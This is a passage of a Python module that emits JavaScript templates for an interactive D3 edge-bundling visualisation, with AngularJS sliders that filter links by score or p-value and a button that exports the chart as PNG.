step: Number(1/Math.pow(10, sliderScoreDecimalPlaces)),
precision: sliderScoreDecimalPlaces,
getSelectionBarColor: function() { return '#2AE02A'; },
getPointerColor: function() { return '#D3D3D3'; },
pointerSize: 1,
onChange: function () {
var pScoreMinValue = $$scope.pos_slider.minValue
var pScoreMaxValue = $$scope.pos_slider.maxValue
var tension = currValues.tension;
currValues['min_p_score'] = pScoreMinValue;
currValues['max_p_score'] = pScoreMaxValue;
//Filter all links out and update links
var FlareData = filterData(Number(d3.max(p_scores))*10, Number(d3.max(p_scores))*10, 'score_pos');
var linkLine = updateBundle(FlareData);
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr('d', d => line(d.source.path(d.target)));
//Apply new filter and update links
var FlareData = filterData(pScoreMinValue, pScoreMaxValue, 'score_pos');
var linkLine = updateBundle(FlareData);
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr('d', d => line(d.source.path(d.target)));
}
}
};
}
if (n_scores.length != 0) {
$$scope.neg_slider = {
minValue: Number(d3.min(n_scores).toFixed(sliderScoreDecimalPlaces)),
maxValue: Number(d3.max(n_scores).toFixed(sliderScoreDecimalPlaces)),
options: {
showSelectionBar: true,
floor: Number(d3.min(n_scores).toFixed(sliderScoreDecimalPlaces)),
ceil: Number(d3.max(n_scores).toFixed(sliderScoreDecimalPlaces)),
step: Number(1/Math.pow(10, sliderScoreDecimalPlaces)),
precision: sliderScoreDecimalPlaces,
getSelectionBarColor: function() { return '#2AE02A'; },
getPointerColor: function() { return '#D3D3D3'; },
pointerSize: 1,
onChange: function () {
var nScoreMinValue = $$scope.neg_slider.minValue
var nScoreMaxValue = $$scope.neg_slider.maxValue
var tension = currValues.tension;
currValues['min_n_score'] = nScoreMinValue;
currValues['max_n_score'] = nScoreMaxValue;
//Filter all links out and update links
var FlareData = filterData(Number(d3.min(n_scores))*10, Number(d3.min(n_scores))*10, 'score_neg');
var linkLine = updateBundle(FlareData);
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr('d', d => line(d.source.path(d.target)));
//Apply new filter and update links
var FlareData = filterData(nScoreMinValue, nScoreMaxValue, 'score_neg');
var linkLine = updateBundle(FlareData);
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr('d', d => line(d.source.path(d.target)));
}
}
};
}
if ("$pmFlag" == "true") {
if (pvalues.length != 0) {
$$scope.pvalue_slider = {
minValue: Number(d3.min(pvalues).toFixed(Number(d3.min(pvalues).countDecimals()))),
maxValue: Number(d3.max(pvalues).toFixed(Number(d3.min(pvalues).countDecimals()))),
options: {
showSelectionBar: true,
floor: Number(d3.min(pvalues).toFixed(Number(d3.min(pvalues).countDecimals()))),
ceil: Number(d3.max(pvalues).toFixed(Number(d3.min(pvalues).countDecimals()))),
step: Number(d3.min(pvalues).toFixed(Number(d3.min(pvalues)).countDecimals())),
logScale: true,
precision: Number(d3.min(pvalues).countDecimals()),
getSelectionBarColor: function() { return '#2AE02A'; },
getPointerColor: function() { return '#D3D3D3'; },
pointerSize: 1,
onChange: function () {
var pvalueMinValue = $$scope.pvalue_slider.minValue;
var pvalueMaxValue = $$scope.pvalue_slider.maxValue;
var tension = currValues.tension;
currValues['min_pvalue'] = pvalueMinValue;
currValues['max_pvalue'] = pvalueMaxValue;
//Filter all links out and update links
var FlareData = filterData(Number(d3.min(pvalues))/10, Number(d3.min(pvalues))/10, 'pvalue');
var linkLine = updateBundle(FlareData);
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr("d", d => line(d.source.path(d.target)));
//Apply new filter and update links
var FlareData = filterData(pvalueMinValue, pvalueMaxValue, 'pvalue');
var linkLine = updateBundle(FlareData);
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr("d", d => line(d.source.path(d.target)));
}
}
};
}
}
$$scope.tension_slider = {
value: Number(0.85),
options: {
showSelectionBar: true,
floor: Number(0.0),
ceil: Number(1.0),
step: 0.05,
precision: 4,
getSelectionBarColor: function() { return '#2AE02A'; },
getPointerColor: function() { return '#D3D3D3'; },
pointerSize: 1,
onChange: function () {
var tension = $$scope.tension_slider.value
currValues['tension'] = tension;
var form = document.getElementById("filterType")
var form_val;
for(var i=0; i<form.length; i++) {
if(form[i].checked) {
form_val = form[i].id;
}
}
if (form_val == "scoreRadio") {
var score_form = document.getElementById("scoreSelect")
var score_form_val;
for(var i=0; i<score_form.length; i++){
if(score_form[i].checked){
score_form_val = score_form[i].id;
}
}
if (score_form_val == "PosScoreRadio") {
var min_p_scoreValue = currValues.min_p_score;
var max_p_scoreValue = currValues.max_p_score;
var FlareData = filterData(min_p_scoreValue, max_p_scoreValue, 'score_pos');
} else if (score_form_val == "NegScoreRadio") {
var min_n_scoreValue = currValues.min_n_score;
var max_n_scoreValue = currValues.max_n_score;
var FlareData = filterData(min_n_scoreValue, max_n_scoreValue, 'score_neg');
} else if (score_form_val == "AbsScoreRadio") {
var min_abs_scoreValue = currValues.min_abs_score;
var max_abs_scoreValue = currValues.max_abs_score;
var FlareData = filterData(min_abs_scoreValue, max_abs_scoreValue, 'score_abs');
}
} else {
if ("$pmFlag" == "true") {
if (form_val == "pvalueRadio") {
var pvalueMinValue = currValues.min_pvalue;
var pvalueMaxValue = currValues.max_pvalue;
var FlareData = filterData(pvalueMinValue, pvalueMaxValue, 'pvalue');
}
}
}
var linkLine = updateBundle(FlareData);
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr("d", d => line(d.source.path(d.target)));
}
}
};
$$scope.savebutton = function () {
var options = {
canvg: window.canvg,
backgroundColor: '$backgroundColor',
height: diameter+100,
width: diameter+100,
left: -50,
top: -50,
scale: 5/window.devicePixelRatio,
encoderOptions: 1,
ignoreMouse : true,
ignoreAnimation : true,
}
saveSvgAsPng(d3.select('svg#edgeBundle').node(), "edgeBundle.png", options);
}
});
function changeFilter() {
var form = document.getElementById("filterType")
var form_val;
for(var i=0; i<form.length; i++){
if(form[i].checked){
form_val = form[i].id;
}
}
if (form_val == "scoreRadio") {
d3.select('#scoreSelect').style("display", 'block');
var form_score = document.getElementById("scoreSelect")
var form_val_score;
for(var i=0; i<form_score.length; i++){
if(form_score[i].checked){
form_val_score = form_score[i].id;
}
}
if (form_val_score == "PosScoreRadio") {
//Filter out all links prior to updating with the score threshold
var FlareData = filterData(Number(d3.max(p_scores))*10, Number(d3.max(p_scores))*10, 'score_pos');
var linkLine = updateBundle(FlareData);
//Filter with the new score threshold
var FlareData = filterData(currValues.min_p_score, currValues.max_p_score, 'score_pos');
var linkLine = updateBundle(FlareData);
} else if (form_val_score == "NegScoreRadio") {
//Filter out all links prior to updating with the score threshold
var FlareData = filterData(Number(d3.min(n_scores))*10, Number(d3.min(n_scores))*10, 'score_neg');
var linkLine = updateBundle(FlareData);
//Filter with the new score threshold
var FlareData = filterData(currValues.min_n_score, currValues.max_n_score, 'score_neg');
var linkLine = updateBundle(FlareData);
} else if (form_val_score == "AbsScoreRadio") {
//Filter out all links prior to updating with the score threshold
var FlareData = filterData(Number(d3.max(abs_scores))*10, Number(d3.max(abs_scores))*10, 'score_abs');
var linkLine = updateBundle(FlareData);
//Filter with the new score threshold
var FlareData = filterData(currValues.min_abs_score, currValues.max_abs_score, 'score_abs');
var linkLine = updateBundle(FlareData);
}
} else {
if ("$pmFlag" == "true") {
if (form_val == "pvalueRadio") {
d3.select('#scoreSelect').style("display", 'none');
//Filter out all links prior to updating with the pvalue threshold
var FlareData = filterData(Number(d3.min(pvalues))/10, Number(d3.min(pvalues))/10, 'pvalue');
var linkLine = updateBundle(FlareData);
//Filter with the new pvalue threshold
var FlareData = filterData(currValues.min_pvalue, currValues.max_pvalue, 'pvalue');
var linkLine = updateBundle(FlareData);
}
} else {
d3.select('#scoreSelect').style("display", 'block');
}
}
var tension = currValues.tension;
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr("d", d => line(d.source.path(d.target)));
}
function changeScore() {
var form = document.getElementById("scoreSelect")
var form_val;
for(var i=0; i<form.length; i++) {
if(form[i].checked){
form_val = form[i].id;
}
}
if (form_val == "PosScoreRadio") {
//Filter out all links prior to updating with the score threshold
var FlareData = filterData(Number(d3.max(p_scores))*10, Number(d3.max(p_scores))*10, 'score_pos');
var linkLine = updateBundle(FlareData);
var FlareData = filterData(currValues.min_p_score, currValues.max_p_score, 'score_pos');
var linkLine = updateBundle(FlareData);
} else if (form_val == "NegScoreRadio") {
//Filter out all links prior to updating with the score threshold
var FlareData = filterData(Number(d3.min(n_scores))*10, Number(d3.min(n_scores))*10, 'score_neg');
var linkLine = updateBundle(FlareData);
var FlareData = filterData(currValues.min_n_score, currValues.max_n_score, 'score_neg');
var linkLine = updateBundle(FlareData);
} else if (form_val == "AbsScoreRadio") {
//Filter out all links prior to updating with the score threshold
var FlareData = filterData(Number(d3.max(abs_scores))*10, Number(d3.max(abs_scores))*10, 'score_abs');
var linkLine = updateBundle(FlareData);
var FlareData = filterData(currValues.min_abs_score, currValues.max_abs_score, 'score_abs');
var linkLine = updateBundle(FlareData);
}
var tension = currValues.tension;
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr("d", d => line(d.source.path(d.target)));
}
if ("$pmFlag" == "true") {
var filterDim = d3.select("#filterType");
filterDim.on("change", changeFilter);
}
var selectDim = d3.select("#scoreSelect");
selectDim.on("change", changeScore);
function updateBundle(data) {
pvalues = []
p_scores = []
n_scores = []
abs_scores = []
var line = d3.radialLine()
.curve(d3.curveBundle.beta(0.85))
.radius(function(d) { return d.y; })
.angle(function(d) { return d.x / 180 * Math.PI; });
var root = d3.hierarchy(packageHierarchy(data), (d) => d.children);
cluster(root)
var nodes = root.descendants();
node = node.data(nodes.filter(function(n) { return !n.children; }));
node.exit().remove();
function getFont() {
var fontBase = 1000;
var fontSize = $fontSize;
var ratio = fontSize / fontBase;
var width = canvas.clientWidth;
var size = width * ratio;
return (size|0) + 'px';
}
function getArcRadiusOffset() {
var arcBase = 1157;
var arcRatio = $arcRadiusOffset / arcBase;
var arcWidth = canvas.clientWidth;
var arcRadOffset = arcWidth * arcRatio;
return (arcRadOffset|0);
}
//Test to see if there are multiple blocks in the data. If none then set addArcs to false
var blocks = []
nodes.forEach(function(n) { if (n.data.Block !== undefined) { blocks.push(n.data.Block) }});
if ("$addArcs" == "true") {
var addArcs = true;
if (blocks.length == 0) {
addArcs = false;
}
} else {
var addArcs = false;
}
if (addArcs == true) {
var groupDict = {}
var adjArcRadiusOffset = getArcRadiusOffset();
var arcTextPositionOffset = 0.75 * adjArcRadiusOffset;
var arcRadius = innerRadius + adjArcRadiusOffset;
var arcGap = adjArcRadiusOffset + 5;
nodes.forEach(function(n) {
if (n.data.Block !== undefined) {
if (groupDict[n.data.Block] === undefined) {
groupDict[n.data.Block] = []
groupDict[n.data.Block].push(n)
} else {
groupDict[n.data.Block].push(n)
}
}
})
var groups = []
for (var [key, value] of Object.entries(groupDict)) {
groups.push(value[0])
}
edgeBundle.selectAll("g.group").remove();
var groupData = edgeBundle.selectAll("g.group")
.data(groups)
.enter().append("group")
.attr("class", "group");
var groupArc = d3.arc()
.innerRadius(innerRadius)
.outerRadius(arcRadius)
.startAngle(function(d) { return (findStartAngle(d.__data__.parent.children)-$extendArcAngle) * Math.PI / 180;})
.endAngle(function(d) { return (findEndAngle(d.__data__.parent.children)+$extendArcAngle) * Math.PI / 180});
edgeBundle.selectAll("g.arc").remove();
edgeBundle.selectAll("g.arc")
.data(groupData._groups[0])
.enter()
.append("svg:path")
.attr("d", groupArc)
.attr("class", "groupArc")
.attr("fill", function(d) { return d.__data__.data.block_color; })
.style("fill-opacity", 1.0)
.attr("id", function(d,i) { return "arc_"+i; });
edgeBundle.selectAll(".arcText").remove();
edgeBundle.selectAll(".arcText")
.data(groupData._groups[0])
.enter()
.append("text")
.attr("class", "arcText")
.attr("x", 5) //Move text from the start angle of the arc
.attr("dy", arcTextPositionOffset) //Move the text down
.append("textPath")
.attr("xlink:href",function(d,i){return "#arc_"+i;})
.style("font-size", getFont())
.text(function(d){return d.__data__.data.Block;});
} else {
var arcGap = 5;
}
if ("$mouseOver" == "true") {
var newNode = node.enter().append("text")
.attr("class", "node")
.attr("dy", ".31em")
.attr("transform", function(d) { return "rotate(" + (d.x - 90) + ")translate(" + (d.y + arcGap) + ",0)" + (d.x < 180 ? "" : "rotate(180)"); })
.style("text-anchor", function(d) { return d.x < 180 ? "start" : "end"; })
.text(function(d) { return d.data.Label; })
.style("font-size", getFont())
.style("fill", function(d) { return d.data.node_color; })
.on("mouseover", mouseovered)
.on("mouseout", mouseouted);
} else {
var newNode = node.enter().append("text")
.attr("class", "node")
.attr("dy", ".31em")
.attr("transform", function(d) { return "rotate(" + (d.x - 90) + ")translate(" + (d.y + arcGap) + ",0)" + (d.x < 180 ? "" : "rotate(180)"); })
.style("text-anchor", function(d) { return d.x < 180 ? "start" : "end"; })
.text(function(d) { return d.data.Label; })
.style("font-size", getFont())
.style("fill", function(d) { return d.data.node_color; })
.on("click", mouseovered)
.on("dblclick", mouseouted);
}
node = node.merge(newNode);
var links = packageImports(root.descendants());
if ("$pmFlag" == "true") {
links = links.map(d=> ({ ...d
, link_color: d.source.data.imports[d.target.data.id]["link_color"]
, link_score: d.source.data.imports[d.target.data.id]["link_score"]
, link_pvalue : d.source.data.imports[d.target.data.id]["link_pvalue"]}));
links.forEach(function(d) { abs_scores.push(Math.abs(d.link_score))
, pvalues.push(d.link_pvalue);
if (d.link_score >= 0) {
p_scores.push(d.link_score);
} else {
n_scores.push(d.link_score);
}
});
} else {
links = links.map(d=> ({ ...d
, link_color: d.source.data.imports[d.target.data.id]["link_color"]
, link_score: d.source.data.imports[d.target.data.id]["link_score"]}));
links.forEach(function(d) { abs_scores.push(Math.abs(d.link_score));
if (d.link_score >= 0) {
p_scores.push(d.link_score);
} else {
n_scores.push(d.link_score);
}
});
}
link = link.data(links);
link.exit().remove();
var newLink = link.enter().append("path")
.attr("class", "link")
.attr('d', d => line(d.source.path(d.target)))
.style("stroke", function(d) { return d.link_color; });
link = link.merge(newLink);
var linkLine = {"line": line, "link": link}
function findStartAngle(children) {
var min = children[0].x;
children.forEach(function(d) {
if (d.x < min) {
min = d.x;
}
});
return min;
}
function findEndAngle(children) {
var max = children[0].x;
children.forEach(function(d) {
if (d.x > max) {
max = d.x;
}
});
return max;
}
function mouseovered(d) {
node
.each(function(n) { n.target = n.source = false; });
link
.classed("link--target", function(l) { if (l.target === d) return l.source.source = true; })
.classed("link--source", function(l) { if (l.source === d) return l.target.target = true; })
.filter(function(l) { return l.target === d || l.source === d; })
.each(function() { this.parentNode.appendChild(this); })
node
.classed("node--both", function(n) { return n.source && n.target; })
.classed("node--target", function(n) { return n.target; })
.classed("node--source", function(n) { return n.source; });
link.style('opacity', o => (o.source === d || o.target === d ? 1 : $linkFadeOpacity))
}
function mouseouted(d) {
link
.classed("link--target", false)
.classed("link--source", false);
node
.classed("node--both", false)
.classed("node--target", false)
.classed("node--source", false);
link.style('opacity', 1);
node.style('opacity', 1);
}
function packageHierarchy(classes) {
var map = {};
function find(id, data) {
var node = map[id], i;
if (!node) {
node = map[id] = data || {id: id, children: []};
if (id.length) {
node.parent = find(id.substring(0, i = id.lastIndexOf("#")));
node.parent.children.push(node);
node.key = id.substring(i + 1);
}
}
return node;
}
classes.forEach(function(d) {
find(d.id, d);
});
return map[""];
}
function packageImports(nodes) {
var map = {}, imports = [];
nodes.forEach(function(d) {
map[d.data.id] = d;
});
nodes.forEach(function(d) {
if (d.data.imports) Object.keys(d.data.imports).forEach(function(i) {
imports.push({source: map[d.data.id], target: map[i]});
});
});
return imports;
}
return linkLine;
}
function filterData(minThreshold, maxThreshold, filtType) {
const data = flareData.map(a => ({...a}));
var FlareData = []
//Remove nodes from imports with weight below threshold
for (var i = 0; i < data.length; i++) {
var flare = data[i];
var links = flare.imports;
var newLinks = {}
for (const [key, value] of Object.entries(links)) {
var link_score = value["link_score"];
var link_color = value["link_color"];
if ("$pmFlag" == "true") {
var link_pvalue = value["link_pvalue"];
}
if (filtType == 'score_abs') {
if ((Math.abs(link_score) >= minThreshold) && (Math.abs(link_score) <= maxThreshold)) {
if ("$pmFlag" == "true") {
newLinks[key] = {"link_score": link_score
, "link_pvalue": link_pvalue
, "link_color": link_color};
} else {
newLinks[key] = {"link_score": link_score
, "link_color": link_color};
}
}
} else if (filtType == 'score_neg') {
if ((link_score <= maxThreshold) && (link_score >= minThreshold)) {
if ("$pmFlag" == "true") {
newLinks[key] = {"link_score": link_score
, "link_pvalue": link_pvalue
, "link_color": link_color};
} else {
newLinks[key] = {"link_score": link_score
, "link_color": link_color};
}
}
} else if (filtType == 'score_pos') {
if ((link_score >= minThreshold) && (link_score <= maxThreshold)) {
if ("$pmFlag" == "true") {
newLinks[key] = {"link_score": link_score
, "link_pvalue": link_pvalue
, "link_color": link_color};
} else {
newLinks[key] = {"link_score": link_score
, "link_color": link_color};
}
}
} else {
if ("$pmFlag" == "true") {
if (filtType == 'pvalue') {
if ((link_pvalue >= minThreshold) && (link_pvalue <= maxThreshold)) {
newLinks[key] = {"link_score": link_score
, "link_pvalue": link_pvalue
, "link_color": link_color};
}
}
}
}
}
flare.imports = newLinks;
FlareData.push(flare)
}
return FlareData;
}
}
redraw();
window.addEventListener("resize", redraw);
'''
return js_text
def __getJSdashboard(self):
js_text = '''
var flareData = $flareData
var pvalues = [];
var p_scores = [];
var n_scores = [];
var abs_scores = [];
var canvas = document.getElementById("edgeBundlePanel");
var edgeBundle = d3.select(canvas).append("svg").attr("id", "edgeBundle");
var redrawCount = 0;
var prevRedrawCount = 0;
var app = angular.module('rzSliderDemo', ['rzSlider']);
function redraw(){
if (redrawCount !== prevRedrawCount) {
setTimeout(function(){
window.location.reload();
});
window.location.reload();
}
prevRedrawCount = redrawCount;
redrawCount = redrawCount+1;
var diameter = canvas.clientWidth;
canvas.style.height = diameter;
var radius = diameter / 2;
var innerRadius = radius - $innerRadiusOffset;
var cluster = d3.cluster()
.separation(function(a, b) { return (a.parent == b.parent ? 1 : $blockSeparation ) })
.size([360, innerRadius]);
edgeBundle.selectAll("*").remove();
edgeBundle = d3.select("svg#edgeBundle")
.attr("width", diameter)
.attr("height", diameter)
.append("g")
.attr("transform", "translate(" + radius + "," + radius + ")")
.append("g");
var node = edgeBundle.selectAll(".node");
var link = edgeBundle.selectAll(".link");
var linkLine = updateBundle(flareData); //Initial generation of bundle to populate arrays
if ("$pmFlag" == "true") {
var currValues = {'max_abs_score': Number(d3.max(abs_scores))
, 'min_abs_score': 0
, 'min_p_score': 0
, 'max_p_score': Number(d3.max(p_scores))
, 'min_n_score': Number(d3.min(n_scores))
, 'max_n_score': 0
, 'min_pvalue': 0
, 'max_pvalue': 1
, 'tension': 0.85};
} else {
var currValues = {'max_abs_score': Number(d3.max(abs_scores))
, 'min_abs_score': 0
, 'min_p_score': 0
, 'max_p_score': Number(d3.max(p_scores))
, 'min_n_score': Number(d3.min(n_scores))
, 'max_n_score': 0
, 'tension': 0.85};
}
String.prototype.trimLeft = function(charlist) {
if (charlist === undefined)
charlist = "\s";
return this.replace(new RegExp("^[" + charlist + "]+"), "");
};
Number.prototype.countDecimals = function () {
if(Math.floor(this.valueOf()) === this.valueOf()) return 0;
var value = 0;
var check = this.toString().includes("e-");
if (check) {
var value = this.toString().split("-")[1];
} else {
var value1 = this.toString().split(".")[1];
var value2 = value1.trimLeft("0");
var value = value1.length - value2.length + 1;
}
return value
}
app.controller('MainCtrl', function ($$scope, $$timeout) {
$$scope.pos_visible = false;
$$scope.neg_visible = false;
$$scope.abs_visible = true;
$$scope.pvalue_visible = false;
$$scope.pos_toggle = function () {
if (!$$scope.pos_visible){
$$scope.pos_visible = !$$scope.pos_visible;
$$scope.abs_visible = false;
$$scope.neg_visible = false;
$$scope.pvalue_visible = false;
$$timeout(function () {
$$scope.$$broadcast('rzSliderForceRender');
});
}
};
$$scope.neg_toggle = function () {
if (!$$scope.neg_visible){
$$scope.neg_visible = !$$scope.neg_visible;
$$scope.pos_visible = false;
$$scope.abs_visible = false;
$$scope.pvalue_visible = false;
$$timeout(function () {
$$scope.$$broadcast('rzSliderForceRender');
});
}
};
$$scope.abs_toggle = function () {
if (!$$scope.abs_visible){
$$scope.abs_visible = !$$scope.abs_visible;
$$scope.pos_visible = false;
$$scope.neg_visible = false;
$$scope.pvalue_visible = false;
$$timeout(function () {
$$scope.$$broadcast('rzSliderForceRender');
});
}
};
$$scope.pvalue_toggle = function () {
if ("$pmFlag" == "true") {
if (!$$scope.pvalue_visible){
$$scope.pvalue_visible = !$$scope.pvalue_visible;
$$scope.pos_visible = false;
$$scope.neg_visible = false;
$$scope.abs_visible = false;
}
} else {
$$scope.pvalue_visible = false;
$$scope.pos_visible = true;
$$scope.neg_visible = true;
$$scope.abs_visible = true;
}
$$timeout(function () {
$$scope.$$broadcast('rzSliderForceRender');
});
};
$$scope.score_toggle = function () {
$$scope.pvalue_visible = !$$scope.pvalue_visible;
var form = document.getElementById("scoreSelect")
var form_val;
for(var i=0; i<form.length; i++) {
if(form[i].checked){
form_val = form[i].id;
}
}
if (form_val == "PosScoreRadio") {
$$scope.pos_visible = true;
} else if (form_val == "NegScoreRadio") {
$$scope.neg_visible = true;
} else if (form_val == "AbsScoreRadio") {
$$scope.abs_visible = true;
}
$$timeout(function () {
$$scope.$$broadcast('rzSliderForceRender');
});
};
var sliderScoreDecimalPlaces = 6;
$$scope.abs_slider = {
minValue: Number(d3.min(abs_scores).toFixed(sliderScoreDecimalPlaces)),
maxValue: Number(d3.max(abs_scores).toFixed(sliderScoreDecimalPlaces)),
options: {
showSelectionBar: true,
floor: Number(d3.min(abs_scores).toFixed(sliderScoreDecimalPlaces)),
ceil: Number(d3.max(abs_scores).toFixed(sliderScoreDecimalPlaces)),
step: Number(1/Math.pow(10, sliderScoreDecimalPlaces)),
precision: sliderScoreDecimalPlaces,
getSelectionBarColor: function() { return '#2AE02A'; },
getPointerColor: function() { return '#D3D3D3'; },
pointerSize: 1,
onChange: function () {
var absScoreMinValue = $$scope.abs_slider.minValue
var absScoreMaxValue = $$scope.abs_slider.maxValue
var tension = currValues.tension;
currValues['min_abs_score'] = absScoreMinValue;
currValues['max_abs_score'] = absScoreMaxValue;
//Filter all links out and update links
var FlareData = filterData(Number(d3.max(abs_scores))*10, Number(d3.max(abs_scores))*10, 'score_abs');
var linkLine = updateBundle(FlareData);
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr('d', d => line(d.source.path(d.target)));
//Apply new filter and update links
var FlareData = filterData(absScoreMinValue, absScoreMaxValue, 'score_abs');
var linkLine = updateBundle(FlareData);
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr('d', d => line(d.source.path(d.target)));
}
}
};
if (p_scores.length != 0) {
$$scope.pos_slider = {
minValue: Number(d3.min(p_scores).toFixed(sliderScoreDecimalPlaces)),
maxValue: Number(d3.max(p_scores).toFixed(sliderScoreDecimalPlaces)),
options: {
showSelectionBar: true,
floor: Number(d3.min(p_scores).toFixed(sliderScoreDecimalPlaces)),
ceil: Number(d3.max(p_scores).toFixed(sliderScoreDecimalPlaces)),
step: Number(1/Math.pow(10, sliderScoreDecimalPlaces)),
precision: sliderScoreDecimalPlaces,
getSelectionBarColor: function() { return '#2AE02A'; },
getPointerColor: function() { return '#D3D3D3'; },
pointerSize: 1,
onChange: function () {
var pScoreMinValue = $$scope.pos_slider.minValue
var pScoreMaxValue = $$scope.pos_slider.maxValue
var tension = currValues.tension;
currValues['min_p_score'] = pScoreMinValue;
currValues['max_p_score'] = pScoreMaxValue;
//Filter all links out and update links
var FlareData = filterData(Number(d3.max(p_scores))*10, Number(d3.max(p_scores))*10, 'score_pos');
var linkLine = updateBundle(FlareData);
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr('d', d => line(d.source.path(d.target)));
//Apply new filter and update links
var FlareData = filterData(pScoreMinValue, pScoreMaxValue, 'score_pos');
var linkLine = updateBundle(FlareData);
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr('d', d => line(d.source.path(d.target)));
}
}
};
}
if (n_scores.length != 0) {
$$scope.neg_slider = {
minValue: Number(d3.min(n_scores).toFixed(sliderScoreDecimalPlaces)),
maxValue: Number(d3.max(n_scores).toFixed(sliderScoreDecimalPlaces)),
options: {
showSelectionBar: true,
floor: Number(d3.min(n_scores).toFixed(sliderScoreDecimalPlaces)),
ceil: Number(d3.max(n_scores).toFixed(sliderScoreDecimalPlaces)),
step: Number(1/Math.pow(10, sliderScoreDecimalPlaces)),
precision: sliderScoreDecimalPlaces,
getSelectionBarColor: function() { return '#2AE02A'; },
getPointerColor: function() { return '#D3D3D3'; },
pointerSize: 1,
onChange: function () {
var nScoreMinValue = $$scope.neg_slider.minValue
var nScoreMaxValue = $$scope.neg_slider.maxValue
var tension = currValues.tension;
currValues['min_n_score'] = nScoreMinValue;
currValues['max_n_score'] = nScoreMaxValue;
//Filter all links out and update links
var FlareData = filterData(Number(d3.min(n_scores))*10, Number(d3.min(n_scores))*10, 'score_neg');
var linkLine = updateBundle(FlareData);
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr('d', d => line(d.source.path(d.target)));
//Apply new filter and update links
var FlareData = filterData(nScoreMinValue, nScoreMaxValue, 'score_neg');
var linkLine = updateBundle(FlareData);
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr('d', d => line(d.source.path(d.target)));
}
}
};
}
if ("$pmFlag" == "true") {
if (pvalues.length != 0) {
$$scope.pvalue_slider = {
minValue: Number(d3.min(pvalues).toFixed(Number(d3.min(pvalues).countDecimals()))),
maxValue: Number(d3.max(pvalues).toFixed(Number(d3.min(pvalues).countDecimals()))),
options: {
showSelectionBar: true,
floor: Number(d3.min(pvalues).toFixed(Number(d3.min(pvalues).countDecimals()))),
ceil: Number(d3.max(pvalues).toFixed(Number(d3.min(pvalues).countDecimals()))),
step: Number(d3.min(pvalues).toFixed(Number(d3.min(pvalues)).countDecimals())),
logScale: true,
precision: Number(d3.min(pvalues).countDecimals()),
getSelectionBarColor: function() { return '#2AE02A'; },
getPointerColor: function() { return '#D3D3D3'; },
pointerSize: 1,
onChange: function () {
var pvalueMinValue = $$scope.pvalue_slider.minValue;
var pvalueMaxValue = $$scope.pvalue_slider.maxValue;
var tension = currValues.tension;
currValues['min_pvalue'] = pvalueMinValue;
currValues['max_pvalue'] = pvalueMaxValue;
//Filter all links out and update links
var FlareData = filterData(Number(d3.min(pvalues))/10, Number(d3.min(pvalues))/10, 'pvalue');
var linkLine = updateBundle(FlareData);
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr("d", d => line(d.source.path(d.target)));
//Apply new filter and update links
var FlareData = filterData(pvalueMinValue, pvalueMaxValue, 'pvalue');
var linkLine = updateBundle(FlareData);
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr("d", d => line(d.source.path(d.target)));
}
}
};
}
}
$$scope.tension_slider = {
value: Number(0.85),
options: {
showSelectionBar: true,
floor: Number(0.0),
ceil: Number(1.0),
step: 0.05,
precision: 4,
getSelectionBarColor: function() { return '#2AE02A'; },
getPointerColor: function() { return '#D3D3D3'; },
pointerSize: 1,
onChange: function () {
var tension = $$scope.tension_slider.value
currValues['tension'] = tension;
var form = document.getElementById("filterType")
var form_val;
for(var i=0; i<form.length; i++) {
if(form[i].checked) {
form_val = form[i].id;
}
}
if (form_val == "scoreRadio") {
var score_form = document.getElementById("scoreSelect")
var score_form_val;
for(var i=0; i<score_form.length; i++){
if(score_form[i].checked){
score_form_val = score_form[i].id;
}
}
if (score_form_val == "PosScoreRadio") {
var min_p_scoreValue = currValues.min_p_score;
var max_p_scoreValue = currValues.max_p_score;
var FlareData = filterData(min_p_scoreValue, max_p_scoreValue, 'score_pos');
} else if (score_form_val == "NegScoreRadio") {
var min_n_scoreValue = currValues.min_n_score;
var max_n_scoreValue = currValues.max_n_score;
var FlareData = filterData(min_n_scoreValue, max_n_scoreValue, 'score_neg');
} else if (score_form_val == "AbsScoreRadio") {
var min_abs_scoreValue = currValues.min_abs_score;
var max_abs_scoreValue = currValues.max_abs_score;
var FlareData = filterData(min_abs_scoreValue, max_abs_scoreValue, 'score_abs');
}
} else {
if ("$pmFlag" == "true") {
if (form_val == "pvalueRadio") {
var pvalueMinValue = currValues.min_pvalue;
var pvalueMaxValue = currValues.max_pvalue;
var FlareData = filterData(pvalueMinValue, pvalueMaxValue, 'pvalue');
}
}
}
var linkLine = updateBundle(FlareData);
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr("d", d => line(d.source.path(d.target)));
}
}
};
$$scope.savebutton = function () {
var options = {
canvg: window.canvg,
backgroundColor: '$backgroundColor',
height: diameter+100,
width: diameter+100,
left: -50,
top: -50,
scale: 5/window.devicePixelRatio,
encoderOptions: 1,
ignoreMouse : true,
ignoreAnimation : true,
}
saveSvgAsPng(d3.select('svg#edgeBundle').node(), "edgeBundle.png", options);
}
});
function changeFilter() {
var form = document.getElementById("filterType")
var form_val;
for(var i=0; i<form.length; i++){
if(form[i].checked){
form_val = form[i].id;
}
}
if (form_val == "scoreRadio") {
d3.select('#scoreSelect').style("display", 'block');
